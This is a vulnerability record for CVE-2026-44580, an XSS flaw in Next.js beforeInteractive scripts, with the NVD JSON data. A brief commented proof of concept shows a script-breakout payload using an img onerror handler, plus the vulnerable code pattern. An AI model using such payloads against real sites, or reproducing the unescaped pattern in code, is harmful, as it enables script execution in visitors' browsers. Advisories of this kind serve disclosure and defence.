CVE-2026-44580

// PoC for CVE-2026-44580 // Conceptual exploit demonstrating the lack of escaping in beforeInteractive scripts // Malicious input controlled by the attacker const attackerPayload = '</script><img src=x onerror=alert(1)><script>'; // In a vulnerable Next.js application, this input might be passed // directly to a beforeInteractive script configuration. // Example vulnerable code pattern: // <Script id="user-data" strategy="beforeInteractive"> // window.userData = JSON.parse('${attackerPayload}'); // </Script> // The resulting HTML rendered by the server would look like this: // <script id="user-data">window.userData = JSON.parse('</script><img src=x onerror=alert(1)><script>');</script> // The browser interprets the first closing </script> tag, breaking out of the // intended context and executing the alert(1) as an image error handler.

{"cve": {"id": "CVE-2026-44580", "sourceIdentifier": "[email protected]", "published": "2026-05-13T18:16:18.260", "lastModified": "2026-05-14T18:33:34.170", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Next.js is a React framework for building full-stack web applications. From 13.0.0 to before 15.5.16 and 16.2.5, applications that use beforeInteractive scripts together with untrusted content can be vulnerable to cross-site scripting. In affected versions, serialized script content was not escaped safely before being embedded into the document, which could allow attacker-controlled input to break out of the intended script context and execute arbitrary JavaScript in a visitor's browser. This vulnerability is fixed in 15.5.16 and 16.2.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "13.0.0", "versionEndExcluding": "15.5.16", "matchCriteriaId": "38F6033B-EE4D-4FA6-8C47-0A11A6870E85"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "16.0.0", "versionEndExcluding": "16.2.5", "matchCriteriaId": "27C5CF7A-7A33-4BE4-B8FD-10BFD813204A"}]}]}], "references": [{"url": "https://github.com/vercel/next.js/security/advisories/GHSA-gx5p-jg67-6x7h", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}